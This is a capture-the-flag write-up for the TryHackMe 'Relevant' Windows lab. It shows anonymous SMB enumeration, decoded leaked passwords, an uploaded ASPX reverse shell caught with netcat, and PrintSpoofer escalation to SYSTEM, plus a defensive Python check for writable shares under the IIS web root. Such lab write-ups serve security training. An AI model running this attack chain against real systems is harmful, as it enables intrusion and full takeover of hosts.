TryHackMe - Relevant - Writeup
Penetration Testing Challenge
Pre-Engagement Briefing
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
* User.txt
* Root.txt
Additionally, the client has provided the following scope allowances:
* Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
* Locate and note all vulnerabilities found
* Submit the flags discovered to the dashboard
* Only the IP address assigned to your machine is in scope
* Find and report ALL vulnerabilities (yes, there is more than one path to root) (Roleplay off)
I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field. Note - Nothing in this room requires Metasploit
Machine may take up to 5 minutes for all services to start.
Writeups will not be accepted for this room.
Nmap Scan
root@ip-10-10-130-6:~# nmap -sCV -A -p- -T4 10.10.247.68
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-24 17:33 BST
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.45% done; ETC: 17:48 (0:14:47 remaining)
Nmap scan report for 10.10.247.68
Host is up (0.00048s latency).
Not shown: 65526 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-05-23T15:56:53
|_Not valid after: 2021-11-22T15:56:53
|_ssl-date: 2021-05-24T16:48:30+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49663/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:26:91:22:B0:8F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: RELEVANT, NetBIOS user: <unknown>, NetBIOS MAC: 02:26:91:22:b0:8f (unknown)
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-24T09:48:30-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-24 17:48:30
|_ start_date: 2021-05-24 16:57:11
TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 10.10.247.68
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 965.68 seconds
root@ip-10-10-130-6:~#
From the default port 80 I could see it is a Windows machine (IIS). I tried to brute-force directories there but found nothing of interest, so I moved on to enumerating SMB.
SMB share enumeration
root@ip-10-10-194-77:~# smbclient -L //10.10.24.156
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.24.156 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
Found an interesting share name, nt4wrksv. Let’s check what’s in there.
Checking SMB Shares
root@ip-10-10-194-77:~# smbclient //10.10.24.156/nt4wrksv
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon May 24 13:42:57 2021
.. D 0 Mon May 24 13:42:57 2021
passwords.txt A 98 Sat Jul 25 16:15:33 2020
7735807 blocks of size 4096. 5129957 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> exit
root@ip-10-10-194-77:~# cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
We found two base64-encoded passwords; let’s decode them.
Decode Base64
root@ip-10-10-194-77:~# echo Qm9iIC0gIVBAJCRXMHJEITEyMw== | base64 --decode
Bob - !P@$$W0rD!123
root@ip-10-10-194-77:~# echo QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk | base64 --decode
Bill - Juw4nnaM4n420696969!$$$
I tried these usernames and passwords to log in via Remote Desktop, since the nmap result shows port 3389 (RDP) open, but none of them worked. I then noticed another web port, 49663, serving the same IIS page as port 80, and brute-forced directories on it. Using directory-list-2.3-medium.txt this took a long time.
root@ip-10-10-130-6:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.111.29:49663/ -t 30 -a Mozilla/5.0
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.111.29:49663/
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: Mozilla/5.0
[+] Timeout: 10s
===============================================================
2021/05/24 18:20:19 Starting gobuster
===============================================================
[ERROR] 2021/05/24 18:22:33 [!] Get http://10.10.111.29:49663/con: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/55139: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/internet_utilities: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/myinfo: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/20861: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/05/24 18:26:23 [!] Get http://10.10.111.29:49663/83263: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/nt4wrksv (Status: 301)
===============================================================
2021/05/24 18:45:07 Finished
===============================================================
I found a directory with the same name as the nt4wrksv SMB share. Out of curiosity I checked whether passwords.txt was visible there: navigating to http://10.10.111.29:49663/nt4wrksv/passwords.txt returned the same password information. If the share is the web directory, we can create an ASPX shell to get access.
I found an ASPX reverse shell, changed the IP and port, uploaded it to the nt4wrksv SMB share, and then requested it over HTTP.
root@ip-10-10-137-185:~# smbclient //10.10.111.29/nt4wrksv
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (7796.5 kb/s) (average 7796.9 kb/s)
smb: \> ls
. D 0 Mon May 24 19:00:12 2021
.. D 0 Mon May 24 19:00:12 2021
passwords.txt A 98 Sat Jul 25 16:15:33 2020
shell.aspx A 15968 Mon May 24 19:00:12 2021
7735807 blocks of size 4096. 5135457 blocks available
smb: \>
I dropped the shell into the SMB share and requested it. We got a shell and also found our first flag, user.txt.
root@ip-10-10-137-185:~# nc -nlvp 4545
Listening on [0.0.0.0] (family 0, port 4545)
Connection from 10.10.111.29 49912 received!
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
C:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
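The root cause of the foothold above is an anonymously writable SMB share whose path sits inside the IIS web root, so anything dropped over SMB is served (and, for .aspx, executed) over HTTP. The check below is an added example, not part of the original writeup: it takes a share inventory of the kind you would collect with Get-SmbShare/Get-SmbShareAccess and Get-WebVirtualDirectory on the host (here constructed inline; only the nt4wrksv share and its path come from the page) and flags every share that is both anonymously writable and mapped under a web root, with the URL path it is exposed at.

```python
import ntpath

# Constructed inventory. The nt4wrksv share and its path are the ones found
# in this writeup; the other entries and the "anon_write" flags are assumed
# for illustration (the page shows a null-session "put" succeeding).
SMB_SHARES = [
    {"name": "ADMIN$",   "path": "C:\\Windows",                    "anon_write": False},
    {"name": "C$",       "path": "C:\\",                           "anon_write": False},
    {"name": "nt4wrksv", "path": "C:\\inetpub\\wwwroot\\nt4wrksv", "anon_write": True},
    {"name": "backups",  "path": "C:\\inetpub\\wwwroot2\\backups", "anon_write": True},
    {"name": "static",   "path": "C:\\inetpub\\wwwroot\\static",   "anon_write": False},
]
WEB_ROOTS = ["C:\\inetpub\\wwwroot"]  # physical paths of IIS sites / virtual dirs


def normalize(path):
    """Canonical lower-cased Windows path ending in a separator, so prefix
    tests only match at a directory boundary (wwwroot2 must not match
    wwwroot). ntpath works on any OS, so this runs fine from a Linux box."""
    return ntpath.normcase(ntpath.normpath(path)).rstrip("\\") + "\\"


def web_path_for(share_path, web_root):
    """URL path under which files in share_path are served by web_root, or
    None when the share does not live inside that web root."""
    share, root = normalize(share_path), normalize(web_root)
    if not share.startswith(root):
        return None
    return "/" + share[len(root):].replace("\\", "/")


def find_exposed_shares(shares, web_roots):
    """Shares that are writable without credentials AND served by IIS. The fix
    is to move the share out of the web root or remove anonymous write
    (and disable script execution for directories that only hold data)."""
    findings = []
    for share in shares:
        for root in web_roots:
            url_path = web_path_for(share["path"], root)
            if url_path is not None and share["anon_write"]:
                findings.append({"share": share["name"], "web_root": root,
                                 "url_path": url_path})
    return findings


if __name__ == "__main__":
    for f in find_exposed_shares(SMB_SHARES, WEB_ROOTS):
        print(f"[!] share {f['share']} is anonymously writable and served at {f['url_path']}")
```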
It’s time to escalate privileges. On a Windows machine, whenever I am going to escalate privileges I run whoami /priv to check which privileges are enabled. It’s my very basic first check.
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeImpersonatePrivilege is enabled. I have previously escalated a box using the same technique, and as the description says we don’t need Metasploit. I searched for a SeImpersonatePrivilege exploit and found PrintSpoofer. Using PrintSpoofer we can get root.
Now upload PrintSpoofer.exe using smbclient and execute it from the shell.
root@ip-10-10-68-160:~# smbclient //10.10.166.92/nt4wrksv
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> put PrintSpoofer.exe
putting file PrintSpoofer.exe as \PrintSpoofer.exe (6624.8 kb/s) (average 6625.0 kb/s)
I executed it from c:\inetpub\wwwroot\nt4wrksv, and we got root. Yay!
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
Thanks for reading.
Machine Link: Relevant